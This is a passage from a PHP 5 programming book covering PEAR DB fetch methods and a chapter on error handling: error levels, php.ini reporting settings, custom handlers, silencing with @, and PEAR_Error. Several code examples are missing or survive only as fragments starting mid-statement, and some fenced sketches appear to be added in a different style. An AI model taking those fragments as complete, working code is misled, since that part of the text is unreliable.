6.4.10.4 $dbh->getAssoc($query, $force_array = false, $params = array(), $fetchmode = DB_FETCHMODE_DEFAULT, $group = false)

This method returns an associative array with the contents of the first column as key and the remaining column as value, like this (one line per row):

    array(col1row1 => col2row1,
          col1row2 => col2row2,
          ...)

If the query returns more than two columns, the value will be an array of these values, indexed according to $fetchmode, like this:

    array(col1row1 => array(col2row1, col3row1...),
          col1row2 => array(col2row2, col3row2...),
          ...)

or with DB_FETCHMODE_ASSOC:

    array(col1row1 => array(name2 => col2row1, name3 => col3row1...),
          col1row2 => array(name2 => col2row2, name3 => col3row2...),
          ...)

The $force_array parameter makes the value an array even if the query returns only two columns.

If the first column contains the same key more than once, a later occurrence will overwrite the first.

Finally, if you set the $group parameter to TRUE, getAssoc() keeps all the rows with the same key in another level of arrays:

    $data = $dbh->getAssoc("SELECT firstname, lastname FROM ppl",
                           false, null, DB_FETCHMODE_ORDERED, true);

This example would return something like this:

    array("Bob" => array("Jones", "the Builder", "Hope"),
          "John" => array("Doe", "Kerry", "Lennon"),
          ...)

6.4.10.5 $dbh->getAll($query, $params = array(), $fetchmode = DB_FETCHMODE_DEFAULT)

This method returns all the data from all the rows as an array of arrays. The inner arrays are indexed according to $fetchmode:

    array(array(name1 => col1row1, name2 => col2row1...),
          array(name1 => col1row2, name2 => col2row2...),
          ...)

You can flip around the dimensions in this array by OR’ing DB_FETCHMODE_FLIPPED into the fetch mode. With a fetch mode of DB_FETCHMODE_FLIPPED | DB_FETCHMODE_ASSOC, the result will look like this:

    array(name1 => array(col1row1, col1row2, ...),
          name2 => array(col2row1, col2row2, ...),
          ...)
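To make the flipped layout concrete, here is a minimal sketch in plain PHP that turns an array of rows into an array of columns. It does not call PEAR DB at all: flip_rows() is a hypothetical helper written for this illustration, and the sample rows merely stand in for what getAll() might return in DB_FETCHMODE_ASSOC.

```php
<?php
// Hypothetical helper (not part of PEAR DB): turns an array of rows into an
// array of columns, the shape described for DB_FETCHMODE_FLIPPED.
function flip_rows(array $rows)
{
    $flipped = array();
    foreach ($rows as $row) {
        foreach ($row as $name => $value) {
            // Append this row's value to the list kept for its column.
            $flipped[$name][] = $value;
        }
    }
    return $flipped;
}

// Sample data standing in for a getAll() result in DB_FETCHMODE_ASSOC.
$rows = array(
    array('id' => 1, 'name' => 'Bob'),
    array('id' => 2, 'name' => 'John'),
);

$columns = flip_rows($rows);
print_r($columns);
```

The flipped form is convenient when you want one whole column at a time, for example all names for a drop-down list, without looping over the rows yourself.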

6.5 SUMMARY

This chapter introduced two new database extensions in PHP 5: mysqli and sqlite. It also presented PEAR DB, which is the most popular database abstraction layer for PHP. In this chapter, you learned:

☞ Some of the strengths and weaknesses of mysql versus sqlite
☞ When it makes sense to use a database abstraction layer
☞ How to connect to databases using mysqli, sqlite, or DB
☞ Executing queries and fetching results with mysqli, sqlite, or DB
☞ Executing prepared queries with mysqli and DB
☞ The difference between buffered and unbuffered queries
☞ Various ways of fetching data from queries
☞ Database error handling
☞ Using triggers and user-defined functions with sqlite
☞ How to create portable database code with DB

CHAPTER 7

Error Handling

7.1 INTRODUCTION

You can reduce the number of errors in your application by using good programming practices; however, many factors cause errors that are beyond our control in a script. Network outages, full hard disks, hardware failure, bugs in other PHP components, or programs your application interacts with can all cause errors that are not due to any fault of your PHP code.

If you do nothing to deal with such errors, PHP’s default behavior is to show the error message to the user, along with a link to the page in the manual describing the function that failed, as well as the file name and line of the code that triggered the error. For most errors, PHP keeps running after displaying this message. See Figure 7.1.

Fig. 7.1 PHP error message.

This error message is really meant for you, the developer, not for the users of your site. Users would appreciate a page explaining, in layman’s terms, what went wrong and have no interest in documentation links or the location of your code. PHP provides a number of options to deal with such errors in a better way.

After you finish reading this chapter, you will have learned

☞ The various types of errors your users might face
☞ What options you, as the developer, have within PHP for handling them
☞ How to write your own error handlers
☞ How to convert between different error-reporting mechanisms

7.2 TYPES OF ERRORS

7.2.1 Programming Errors

Sometimes errors occur due to errors in our code. In some ways, these are the easiest errors to deal with because they can be uncovered mostly by straightforward testing, simply by trying out all the operations your application provides. Handling them is just a matter of correcting the code.

7.2.1.1 Syntax/Parse Errors

Syntax errors and other parse errors are caught when a file is compiled, before PHP starts executing it at all. The example script for this case, test.php, contains an XML tag where PHP expects to find code. Running it results in an error:

    Parse error: parse error in test.php on line 4

As you can see, the script did not even print Hello! before displaying an error message, because the syntax error was discovered during compilation, before PHP started executing the script.

7.2.1.2 Eval

All syntax or parse errors are caught during compilation, except errors in code executed with eval(). In the case of eval(), the code is compiled during the execution of the script. When the previous example is modified so that the offending code is passed to eval(), the output is different:

    Hello!
    Parse error: parse error in /home/ssb/test.php(4) : eval()'d code on line 1

As you can see, this time the error was displayed during execution. This is because code executed with eval() is not compiled until the eval() itself is executed.

7.2.1.3 Include / Require

If your script includes another file that has a parse error, compilation will stop at the parse error. Code and declarations preceding the parse error are compiled, and those following the error are discarded. This means that you will get a half-compiled file if there is a parse error in it.

The following example uses two files, error.php and test.php:

    $* $@ $2 :; <@>
    function bar() { print "bar\n"; }
    ?>

(The line in the middle is not line noise; it is taken from the configuration file of sendmail, a UNIX mail server infamous for its unreadable configuration file format.)

Fig. 7.2 Output from executing error3.php.

What happens here? First, PHP compiles test.php and starts executing it. When it encounters the require statement, it starts compiling error.php, but aborts after the parse error on line 7 of error.php. However, the function foo() has already been defined because it was reached before the parse error. But PHP never got around to defining the function bar() due to the parse error.

Next, in execution of test.php, PHP prints Hello!, calls the foo() function that prints foo, but fails trying to call bar() because it has not been defined.

7.2.2 Undefined Symbols

When PHP executes, it may encounter names of variables, functions, and so on that it does not know. Because PHP is a loosely typed interpreted language, it does not have complete knowledge about all symbol names, function names, and so on during compilation. This means that it may run into unknown symbols during execution. Although syntax errors are caught before the code is executed, errors regarding undefined symbols occur while the code runs.

7.2.2.1 Variables and Constants

Undefined variables and constants are not dramatic; they pass with just a notice (see the section about PHP error levels later in this chapter). The output of a script that uses both is

    Notice: Undefined variable: undefined_variable in test.php on line 3
    NULL

    Notice: Use of undefined constant UNDEFINED_CONSTANT - assumed 'UNDEFINED_CONSTANT' in test.php on line 4
    string(18) "UNDEFINED_CONSTANT"
    Still alive!

As you can see, the undefined variable evaluates to NULL, while the undefined constant evaluates to a string with the name of the constant. The error messages displayed are just notices, which is the least significant type of PHP error message.

Using undefined variables in PHP is not an error, just sloppy coding practice. Read the section on register_globals security for some examples of what this could lead to in the worst-case scenario.

Technically, using undefined variables is okay, and if you disable notices it will not produce any error messages. However, because notices come in handy for other things (such as noticing undefined constants!), we recommend that you keep reporting them enabled and fix your undefined variables. As a last resort, you can silence the expressions that cause notices individually with the @ statement.

Undefined constants are bugs. A side effect of using an undefined constant is that it returns a string with the name of the constant, but never rely on this. Put your strings in quotes.
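One way to fix undefined variables and constants, rather than silencing the notices, is to test for them before use. The following is a minimal sketch using only the built-in isset(), defined(), and constant(); the variable and constant names are made up for the illustration.

```php
<?php
define('SITE_NAME', 'example');   // illustrative constant

// isset() tests a variable without triggering an "undefined variable" notice.
$greeting = isset($undefined_variable) ? $undefined_variable : 'hello';

// defined() tests a constant by name; constant() then reads it by name.
$site    = defined('SITE_NAME') ? constant('SITE_NAME') : 'unknown';
$missing = defined('UNDEFINED_CONSTANT') ? constant('UNDEFINED_CONSTANT') : 'unknown';

print "$greeting $site $missing\n";
```

Supplying an explicit default this way keeps the code notice-safe while still leaving notices enabled for the cases you did not anticipate.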

7.2.2.2 Array Indexes

Consider a script that reads $_GET["name"] without first checking that it is set. If the page serving this script is requested without any GET parameters, it displays a notice:

    test.php(3) : Notice - Undefined index: name

7.2.2.3 Functions and Classes

Although PHP keeps executing after running across an undefined variable or constant, it aborts whenever it encounters an undefined function or class. The output of a script that calls an undefined function between two print statements is

    Yoda says:
    Fatal error: Call to undefined function: undefined_this_function_is() in test.php on line 4

The second print on line 5 was never executed because PHP exits with a fatal error when it tries to call the undefined function.

The same thing happens with an undefined class:

The output is

    Yoda says:
    Fatal error: Class 'undefined_class' not found in test.php on line 4

Classes have one exception. If there is a user-defined function called __autoload, it is called when PHP runs across an undefined class. If the class is defined after __autoload returns, the newly loaded class is used, and no fatal error occurs.

7.2.2.4 Logical Errors

Discovering parse errors or undefined symbols is relatively easy. A more subtle type of programming error is a logical error: an error in the structure and logic of the code rather than just the syntax. The best way to find logical errors is testing combined with code reviews.

7.2.3 Portability Errors

7.2.3.1 Operating System Differences

Although PHP itself runs on many different platforms, that does not automatically make all PHP code 100 percent platform-independent. There are always some OS-specific issues to consider. Here are some examples:

☞ PHP functions that are available only on a specific platform
☞ PHP functions that are not available on a specific platform
☞ PHP functions that differ slightly on different platforms
☞ Which character is used to separate path components in file names
☞ External programs or services that are not available on all platforms

7.2.3.2 PHP Configuration Differences

With all the different options available in PHP’s configuration file (php.ini), it is easy to get into trouble when making assumptions about these settings.

One common example is the magic_quotes_gpc ini option. If this option is enabled, PHP adds slashes (like the addslashes() function) on all external data. If you write your code on a system with this option disabled, and then move it to a server with magic_quotes_gpc enabled, your user input will suffer from “backslash pollution.”

The correct way to handle such variations is to check in your PHP code whether an option is enabled with the ini_get() function, and make the appropriate adjustments.
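The ini_get() check described above can be sketched as a small input helper. This is only an illustration: clean_input() is a hypothetical name, not a PHP or PEAR function, and the 'email' key is an arbitrary example.

```php
<?php
// Hypothetical helper, not part of PHP or PEAR: returns request input with
// the slashes added by magic_quotes_gpc removed, if that setting is enabled.
function clean_input($value)
{
    // ini_get() returns false for options unknown to the running PHP
    // version, in which case the value is returned untouched.
    if (ini_get('magic_quotes_gpc')) {
        return stripslashes($value);
    }
    return $value;
}

// Read one GET parameter in a way that behaves the same with either setting.
$email = isset($_GET['email']) ? clean_input($_GET['email']) : '';
print "email: $email\n";
```

Routing all external input through one such function keeps the configuration check in a single place instead of scattering it across the application.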

For example, in the magic_quotes_gpc case, you should do this:

    $dbh->query("INSERT INTO emails VALUES(?)", array($_GET["email"]));
    ?>

register_globals

The register_globals setting determines whether PHP should import GET, POST, cookie, environment, or server variables as global variables. In re-usable code, avoid relying on register_globals; instead, use the superglobal variables provided for accessing them ($_GET and friends).

register_argc_argv

This variable controls whether the global variables $argc and $argv should be set. In the CLI version of PHP, these are set by default and required for PHP to access command-line parameters.

magic_quotes_gpc, magic_quotes_runtime

Magic quotes is the name of a PHP feature that automatically quotes input data, by using the addslashes() function. Historically, this was used so that form data could be used directly in SQL queries without any security or quoting issues. Today, form data is used for much more, and magic quotes quickly get in the way. We recommend that you disable this feature, but portable code must be aware of these settings and deal with them appropriately by calling stripslashes() on GPC (GET, POST, and cookie) data.

y2k_compliance

Setting y2k_compliance to on causes PHP to display four-digit years instead of two-digit years. Oddly enough, the only value that is known to cause problems with some browsers is on, which is why it is off by default.

unserialize_callback_func

This setting is a string with the name of the function used for de-serializing data when the unserialize() function is used.

arg_separator.input

When receiving GET and POST form data, the ampersand character (&) is used by default to separate key-value pairs. With this option, the separator character can be changed to something else, which could cause portability problems.
allow_url_fopen

By default, PHP’s file functions support reading and writing URLs. If this option is set to false, URL file operations are disabled. You may need to deal with this in portable code, either by having a userland implementation in reserve, or by checking whether this option is set upon startup and refusing to run if URL file operations are not allowed.

7.2.3.3 SAPI Differences

PHP is not only available for many different operating systems, but it also offers native interfaces to a range of different Server APIs, or SAPIs in PHP lingo. The most common PHP SAPI is the Apache 1.3 module; others are CGI, CLI, the IIS filter, the embeddable version of PHP, and so on.

Some SAPIs offer PHP functions that are available only in that SAPI. For example, the Apache 1.3 SAPI offers a function called apache_note() to pass information to other Apache modules. Table 7.1 shows some SAPI-specific functions.

Table 7.1 SAPI-Specific Functions

    Function                   SAPI Layers that Define It
    ApacheRequest (class)      apache_hooks
    apache_lookup_uri          apache, apache_hooks, apache2filter
    apache_request_headers     apache, apache_hooks, apache2filter
    apache_response_headers    apache, apache_hooks, apache2filter
    apache_note                apache, apache_hooks, apache2filter
    apache_setenv              apache, apache_hooks, apache2filter
    apache_getenv              apache, apache_hooks
    apachelog                  apache, apache_hooks
    apache_child_terminate     apache, apache_hooks
    apache_exec_uri            apache, apache_hooks
    getallheaders              aolserver, apache, apache_hooks, apache2filter
    smfi_setflags              milter
    smfi_settimeout            milter
    smfi_getsymval             milter
    smfi_setreply              milter
    smfi_addheader             milter
    smfi_chgheader             milter
    smfi_addrcpt               milter
    smfi_delrcpt               milter
    smfi_replacebody           milter
    virtual                    apache, apache_hooks, apache2filter
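Portable code can guard calls to SAPI-specific functions such as those in Table 7.1 with function_exists() and fall back to something available everywhere. The sketch below does this for getallheaders(); both helper names are hypothetical, and the fallback assumes the common convention that request headers appear in $_SERVER under HTTP_* keys.

```php
<?php
// Hypothetical helper: converts a $_SERVER key such as HTTP_ACCEPT_LANGUAGE
// into a header name such as Accept-Language.
function header_name_from_server_key($key)
{
    $words = strtolower(str_replace('_', ' ', substr($key, 5)));
    return str_replace(' ', '-', ucwords($words));
}

// Hypothetical wrapper: uses getallheaders() where the SAPI defines it and
// otherwise rebuilds the header list from $_SERVER.
function portable_request_headers()
{
    if (function_exists('getallheaders')) {
        $headers = getallheaders();
        if (is_array($headers)) {
            return $headers;
        }
    }
    $headers = array();
    foreach ($_SERVER as $key => $value) {
        if (strpos($key, 'HTTP_') === 0) {
            $headers[header_name_from_server_key($key)] = $value;
        }
    }
    return $headers;
}

print "SAPI: " . php_sapi_name() . "\n";
print_r(portable_request_headers());
```

The caller never needs to know which SAPI is in use; only the wrapper does.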

7.2.3.4 Dealing with Portability

Portability errors can be tricky to find because they require that you test your code thoroughly in different configurations on different systems. However, proper testing and code reviews are the best ways to find portability problems.

Of course, if you write and deploy all of your code on the same platform with a homogeneous configuration, you may never run into any portability problems. Awareness of portability issues is a good thing anyway; it enables you to write better, more re-usable, and more robust code.

Fixing portability errors may be easy, such as checking the ini setting, as in the previous magic_quotes_gpc example. But it may be more difficult as well. You may need to parse the output of a command differently for different operating systems, or provide a fallback implementation written in PHP for something available only on some platforms. In some cases, what you do is not even possible to do in a portable way.

In general, the best approach to portability problems is hiding the operating system or SAPI details in a code layer, abstracting away the problem. One example of such an abstraction is the System class from PEAR, which provides PHP implementations of some common UNIX commands and other common operations that are OS-specific.

7.2.3.5 Portability Tools

PEAR class: System

The System PEAR class is available as part of the basic PEAR install.

PEAR class: OS_Guess

The OS_Guess class uses the php_uname() function to determine on which operating system it is running. It also provides ways of generalizing and comparing OS signatures:

    <?php
    require_once 'OS/Guess.php';

    $os = new OS_Guess;
    print "OS signature: " . $os->getSignature() . "\n";
    if ($os->matchSignature("linux-*-i386")) {
        print "Linux running on an Intel x86 CPU\n";
    }
    ?>

Example output:

    OS signature: linux-2.4-i386-glibc2.1
    Linux running on an Intel x86 CPU

7.2.4 Runtime Errors

Once code is up and running, non-fatal runtime errors are the most common type of error in PHP. Runtime errors are errors that occur during execution of the code; they are usually not programming errors but are caused by factors outside PHP itself, such as disk or network operations or database calls.

PHP has an error-reporting mechanism that is used for all errors triggered inside PHP itself, either during compilation of the script or when executing a built-in function. You can use this error-reporting mechanism from a script as well, although there are more powerful ways of reporting errors (such as exceptions).

The rest of this chapter focuses on some forms of runtime errors. Even perfectly good code may produce runtime errors, so everyone has to deal with them in one way or another.

Examples of runtime errors occur when fopen() fails because a file is missing, when mysql_connect() fails because you specified the wrong username, if fsockopen() fails because your system runs out of file descriptors, or if you tried inserting a row into a table without providing a required not-null column.

7.2.5 PHP Errors

The error mechanism in PHP is used by all built-in PHP functions. By default, this simple mechanism prints an error message with file and line number and exits. In the previous section, we saw several examples of PHP errors.

7.2.5.1 Error Levels

PHP errors are categorized by an error level ranging from notices to fatal errors. The error level tells you how serious the error is. Most errors may be caught with a custom error handler, but some are unrecoverable.

E_ERROR

This is a fatal, unrecoverable error. Examples are out-of-memory errors, uncaught exceptions, or class redeclarations.

E_WARNING

This is the most common type of error. It normally signals that something you tried doing went wrong. Typical examples are missing function parameters, a database you could not connect to, or division by zero.

E_PARSE

Parse errors occur during compilation, and force PHP to abort before execution. This means that if a file fails with a parse error, none of it will be executed.

E_STRICT

This error level is the only one not included in the E_ALL constant. The reason for this is to make the transition from PHP 4 to PHP 5 easier; you can still run PHP 4 code in PHP 5.

E_NOTICE

Notices are PHP’s way to tell you that the code it runs may be doing something unintentional, such as reading an undefined variable. It is good practice to develop with notices enabled so that your code is “notice-safe” before pushing it live. On your production site, you should completely disable HTML errors.

E_CORE_ERROR

This internal PHP error is caused by an extension that failed starting up, and it causes PHP to abort.

E_COMPILE_ERROR

Compile errors occur during compilation, and are a variation of E_PARSE. This error causes PHP to abort.

E_COMPILE_WARNING

This compile-time warning warns users about deprecated syntax.

E_USER_ERROR

This user-defined error causes PHP to abort execution. User-defined errors (E_USER_*) are never caused by PHP itself, but are reserved for scripts.

E_USER_WARNING

This user-defined error will not cause PHP to exit. Scripts may use it to signal a failure corresponding to one that PHP would signal with E_WARNING.

E_USER_NOTICE

This user-defined notice may be used in scripts to signal possible errors (analogous to E_NOTICE).

7.2.5.2 Error Reporting

Several php.ini configuration settings control which errors should be displayed and how.

error_reporting (Integer)

This setting is the default error reporting for every script. The parameter may be any of the constants listed here, E_ALL for everything, or a bitwise expression such as E_ALL & ~E_NOTICE (for everything except notices).

display_errors (Boolean)

This setting controls whether errors are displayed as part of PHP’s output. It is set to On by default.

display_startup_errors (Boolean)

This setting controls whether errors are displayed during PHP startup. It is set to Off by default and is meant for debugging C extensions.

error_prepend_string (String)

This string is displayed immediately before the error message when displayed in the browser.

error_append_string (String)

This string is displayed immediately after the error message when displayed in the browser.

track_errors (Boolean)

When this setting is enabled, the variable $php_errormsg is defined in the scope PHP is in when an error occurs. The variable contains the error message.

html_errors (Boolean)

This setting controls whether HTML formatting is applied to the error message. The default behavior is to display HTML errors, except in the CLI version of PHP (see Chapter 16, “PHP Shell Scripting”).

xmlrpc_errors (Boolean)

This setting controls whether errors should be displayed as XML-RPC faults.

xmlrpc_error_number (Integer)

This XML-RPC fault code is used when xmlrpc_errors is enabled.

log_errors (Boolean)

This setting controls whether errors should be logged. The log destination is determined by the error_log setting. By default, errors are logged to the web server’s error log.

log_errors_max_len (Integer)

This is the maximum length of messages logged when log_errors is enabled. Messages exceeding this length are still logged, but are truncated.

error_log (String)

This setting determines where to place logged errors. By default, they are passed on to the web server’s error-logging mechanism, but you may also specify a file name, or syslog to use the system logger. Syslog is supported for UNIX-style systems only.
ignore_repeated_errors (Boolean)

When enabled, this setting makes PHP not display the exact same message two or more times in a row.

ignore_repeated_source (Boolean)

When enabled, PHP will not display an error originating from the same line in the same file as the last displayed error. It has no effect if ignore_repeated_errors is not enabled.
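The same settings can also be changed from within a script, using the built-in error_reporting() and ini_set() functions. The sketch below applies the mask E_ALL & ~E_NOTICE at runtime and uses bit tests to show which levels the mask covers; the variable names are illustrative only.

```php
<?php
// Report everything except notices; the same expression works in php.ini.
$level    = E_ALL & ~E_NOTICE;
$previous = error_reporting($level);   // returns the level that was in effect

ini_set('display_errors', '0');        // do not show errors in the output
ini_set('log_errors', '1');            // log them instead

// A bitwise AND against a level constant tells whether the mask includes it.
$reports_notices  = (bool) ($level & E_NOTICE);
$reports_warnings = (bool) ($level & E_WARNING);

var_dump($reports_notices);
var_dump($reports_warnings);
```

Settings changed this way apply only to the running script, and they take effect too late to influence errors raised before the calls execute, such as parse errors in the script itself.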

Here is a good set of php.ini error-handling settings for development servers:

    error_reporting = E_ALL
    display_errors = on
    html_errors = on
    log_errors = off

Notices are enabled, which encourages you to write notice-safe code. You will quickly spot problems as you test with your browser. All errors are shown in the browser, so you spot them while developing.

For production systems, you would want different settings:

    error_reporting = E_ALL & ~E_NOTICE
    display_errors = off
    log_errors = on
    html_errors = off
    error_log = "/var/log/httpd/my-php-error.log"
    ignore_repeated_errors = on
    ignore_repeated_source = on

Here, no error messages are displayed to the user; they are all logged to /var/log/httpd/my-php-error.log. HTML formatting is disabled, and repeating errors are logged only once. Check the error log periodically to look for problems you did not catch during testing.

The important thing to keep in mind is that error messages printed by PHP are meant for developers, not for the users of the site. Never expose PHP error messages directly to the user; catch the error if possible, and present the user with a better explanation of what went wrong.

7.2.5.3 Custom Error Handlers

Instead of having PHP print or log the error message, you can register a function that is called for each error. This way, you can log errors to a database or even send an email alert to a pager or mobile phone.

The following example logs all notices to /var/log/httpd/my-php-errors.log and converts other errors to PEAR errors:
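As a self-contained stand-in for a handler of this kind, the following sketch logs notices to a file and converts every other error into an exception. Two things differ from the description above and are assumptions of this sketch: the log file is placed in the system temporary directory rather than under /var/log/httpd, and errors are converted to PHP's built-in ErrorException rather than to PEAR errors, so that the code runs without PEAR installed.

```php
<?php
// Assumption: a log file in the system temp directory stands in for the
// /var/log/httpd path mentioned in the text.
define('MY_ERROR_LOG',
       sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'my-php-errors.log');

function my_error_handler($errno, $errstr, $errfile, $errline)
{
    if ($errno == E_NOTICE || $errno == E_USER_NOTICE) {
        // Message type 3 appends the message to the given file.
        error_log("$errfile:$errline: $errstr\n", 3, MY_ERROR_LOG);
        return true;   // handled; PHP's built-in handler is skipped
    }
    // Stand-in for "convert to a PEAR error": raise an ErrorException.
    throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
}

set_error_handler('my_error_handler');

trigger_error('just a notice', E_USER_NOTICE);   // written to the log file

$caught = null;
try {
    trigger_error('something failed', E_USER_WARNING);
} catch (ErrorException $e) {
    $caught = $e->getMessage();
    print "Caught: $caught\n";
}
```

Fatal errors such as E_ERROR and E_PARSE never reach a handler registered with set_error_handler(), so a handler like this complements the php.ini logging settings rather than replacing them.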

7.2.5.4 Silencing Errors
Sometimes, you may wish to run your script with a high error level, but some things you do often produce a notice. Or, you may want to completely hide PHP's error messages from time to time, and would rather use $php_errormsg in another error-reporting mechanism, such as an exception or PEAR error.

In this case, you can silence errors with the @ statement prefix. When a statement or expression is executed with a @ in front, the error level is reduced to 0 for that statement or expression only:

    ...get('id', $_GET['id']);
        print "The name you are looking for is $name!\n";
    }
    ?>

When running this example with error_reporting set to E_ALL, a notice will be triggered if there is no 'id' index in the $_GET array. However, because we prefix the expression with the silencing operator @, no error message is displayed.

Custom error handlers will be called regardless of the silencing operator; only the built-in error displaying and logging mechanisms are affected. This is something you should be aware of if you define your own error handler, so your handler does not report silenced errors unintentionally. Because silenced errors have the error_reporting setting temporarily set to 0, we can use the following approach:
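As a self-contained sketch of that check, the handler below ignores any error whose level is currently masked out of error_reporting(). Testing the bit mask rather than comparing against 0 is a deliberate choice: on PHP 8 and later the @ operator leaves the fatal error levels enabled instead of setting the level to exactly 0, and the mask test covers both behaviors. The names reported_errors() and quiet_aware_handler() are hypothetical.

```php
<?php
error_reporting(E_ALL);

// Hypothetical helper: remembers the messages the handler reported
function reported_errors($add = null)
{
    static $seen = array();
    if ($add !== null) {
        $seen[] = $add;
    }
    return $seen;
}

function quiet_aware_handler($num, $str, $file, $line)
{
    // Inside an @-silenced expression this level is masked out
    if (!(error_reporting() & $num)) {
        return true;
    }
    reported_errors($str);
    return true;
}

set_error_handler('quiet_aware_handler');
trigger_error("not silenced error", E_USER_NOTICE);
@trigger_error("silenced error", E_USER_NOTICE);

print implode("\n", reported_errors()) . "\n";
?>
```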

        ...
        }
        $file = basename($file);
        print "$type: $file:$line: $str\n";
    }
    set_error_handler("my_error_handler");
    trigger_error("not silenced error", E_USER_NOTICE);
    @trigger_error("silenced error", E_USER_NOTICE);
    ?>

Here, we check the current error_reporting setting before displaying the error message. If error_reporting is 0, the custom error handler aborts before printing anything. Thus, the silencing is effective even with our custom error handler.

7.3 PEAR ERRORS

PEAR has its own error-reporting mechanism based around the principle of errors as types, and the ability to pass around errors as values. Many extras were built around this principle, to the point where PEAR errors almost function like a poor man's (in this case, PHP 4 users') exception.

Where PHP's built-in error mechanism typically displays a message and a function returns false, a function returning a PEAR error gives an object back that is an instance of PEAR_Error or a subclass:

    ...getMessage() . ")\n");
    }
    print "DB::connect ok!\n";
    ?>

In this introductory example, we try connecting to a MySQL database through PEAR DB. If the connection fails, DB::connect returns a PEAR error. The PEAR::isError() static method returns a boolean that tells whether a value is a PEAR error. If the return value from DB::connect is a PEAR error, the connection attempt has failed. In this case, we call getMessage() in the error object to retrieve the error message, print it, and abort.

This is a simple example of how PEAR's error handling works. There are many ways of customizing it that we will look at later. First, we examine the different ways of raising and catching PEAR errors, and get an overview of the PEAR_Error class.

7.3.0.1 Catching Errors
Unless an error handler that aborts execution is configured, the return value of a function failing with a PEAR error will be the error object. Depending on the error-handling setup, some kind of action may have been taken already, but there is no provided way of telling. One of the code design implications of this is that PEAR error-handling defaults should always be set by the driving script, that is, the script that PHP started executing. If some included library starts setting up error-handling defaults or global resources such as INI entries, trouble awaits.

7.3.0.2 PEAR::isError()
bool PEAR::isError(mixed candidate)

This method returns true or false depending on whether candidate is a PEAR error. If candidate is an object that is an instance of PEAR_Error or a subclass, PEAR::isError() returns true.

7.3.0.3 Raising Errors
In PEAR terminology, errors are "raised," although the easiest way of raising a PEAR error is returning the return value from a method called throwError. This is simply because throwError is a simplified version of the original raiseError method. PEAR uses the term raising to avoid confusion with PHP exceptions, which are thrown.

The relative cost of raising a PEAR error compared to triggering a PHP error is high, because it involves object creation and several function calls. This means that you should use PEAR errors with care: keep them for failures that should not normally happen. Prefer using a simple Boolean return value for the normal cases. The same advice applies to exceptions in PHP, as well as in C++, Java, or other languages.
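The errors-as-values pattern described in this section can be tried without PEAR installed. The sketch below is only a stand-in: SketchError, SketchDbError, sketch_is_error(), and sketch_connect() are hypothetical names invented for illustration and are not part of PEAR, although they are shaped after PEAR_Error, PEAR::isError(), and DB::connect() as the text describes them.

```php
<?php
// Hypothetical stand-in for PEAR_Error: an error carried as a value
class SketchError
{
    private $message;
    private $code;

    public function __construct($message = 'unknown error', $code = -1)
    {
        $this->message = $message;
        $this->code = $code;
    }

    public function getMessage() { return $this->message; }
    public function getCode()    { return $this->code; }
}

// Packages may specialize the error class, as PEAR packages do
class SketchDbError extends SketchError { }

// Stand-in for PEAR::isError(): true for the class or any subclass
function sketch_is_error($candidate)
{
    return $candidate instanceof SketchError;
}

// Stand-in for a function that returns either a result or an error
function sketch_connect($dsn)
{
    if (strpos($dsn, 'mysql://') !== 0) {
        return new SketchDbError("unsupported DSN '$dsn'", -2);
    }
    return "connection to $dsn";
}

$dbh = sketch_connect('mysql://test@localhost/world');
if (sketch_is_error($dbh)) {
    die("connect failed (" . $dbh->getMessage() . ")\n");
}
print "connect ok!\n";
?>
```

Because the check is an instance test, a subclass such as SketchDbError is recognized as well, which is the property the text attributes to PEAR::isError().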
When you use PEAR packages in your code, you need to deal with errors raised by the package. When you raise errors yourself, you can do so in one of two ways, depending on whether you are in an object context, and whether your current class inherits the PEAR class.

If your code does not run in an object context, such as from the global scope, inside a regular function, or in a static method, you need to call the PEAR::throwError() static method:

    ...getMessage() . "\n");
    }
    print "You were lucky, this time.\n";

    function lucky()
    {
        if (rand(0, 1) == 0) {
            return PEAR::throwError('tough luck!');
        }
    }
    ?>

When errors are raised with static method calls, the defaults set with PEAR::setErrorHandling() are applied. The other way of raising errors is when your class has inherited PEAR, and your code is executed in an object context:

    ...throwError('tough luck!');
            }
            return "lucky!";
        }
    }
    $luck = new Luck;
    $test = $luck->testLuck();
    if (PEAR::isError($test)) {
        die($test->getMessage() . "\n");
    }
    print "$test\n";
    ?>

When throwError() is called in an object context, defaults set in that object with $object->setErrorHandling() are applied first. If no defaults are set for the object, the global defaults apply, as with errors raised statically (like in the previous example).

7.3.0.4 PEAR::throwError()
object PEAR::throwError([string message], [int code], [string userinfo])

This method raises a PEAR error, applying default error-handling settings. Which defaults are actually applied depends on how the method is called. If throwError() is called statically, such as PEAR::throwError(), the global defaults are applied. The global defaults are always set with PEAR::setErrorHandling() called statically. When throwError() is called from an object context, such as $this->throwError(), the error-handling defaults of $this are applied first. If the defaults for $this are undefined, the global defaults are applied instead.

If you are not intimate with the semantics of $this in PHP, you may be in for some surprises when using PEAR error defaults. If you call a method statically from within an object (where $this has a value), the value of $this will actually be defined inside the statically called method as well. This means that if you call PEAR::throwError() from inside an object, $this will be defined inside PEAR::throwError() and refer to the object from which you called PEAR::throwError(). In most cases, this has no effect, but if you start using PEAR's error-handling mechanism to its fullest, you should be aware of this so you are not surprised by the wrong error-handling defaults being applied.

7.3.0.5 PEAR::raiseError()
object PEAR::raiseError([string message], [int code], [int mode], [mixed options], [string userinfo], [string error_class], [bool skipmsg])

This method is equivalent to throwError() but with more parameters. Normally, you would not need all these extra options, but they may come in handy if you are making your own error system based on PEAR errors. message, code, and userinfo are equivalent to the same throwError() parameters. mode and options are equivalent to the same PEAR_Error constructor parameters (see the following PEAR_Error description). The two remaining parameters are error_class and skipmsg:

string $error_class (default "PEAR_Error")
This class will be used for the error object. If you change this to something other than PEAR_Error, make sure that the class you are giving here extends PEAR_Error, or PEAR::isError() will not give correct results.

bool $skipmsg (default false)
This rather obscure parameter tells the raiseError() implementation to skip the message parameter completely, and simply pretend there is no such parameter. If skipmsg is true, the constructor of the error object is called with one less parameter, without message as the first parameter. This may be useful for extended error mechanisms that want to base everything on error codes.

7.3.1 The PEAR_Error Class

The PEAR_Error class is PEAR's basic error-reporting class. You may extend and specialize it for your own purposes if you need to; PEAR::isError() will still recognize it.

7.3.1.1 PEAR_Error constructor
void PEAR_Error([string message], [int code], [int mode], [mixed options], [string userinfo])

All PEAR_Error's constructor parameters are optional and default to the null value, except message, which defaults to unknown error. However, normally, you do not create PEAR errors with the new statement, but with a factory method such as PEAR::raiseError() or PEAR::throwError().

string $message (default "unknown error")
This is the error message that will be displayed. This parameter is optional, but you should always specify either $code or $message.

int $code (default -1)
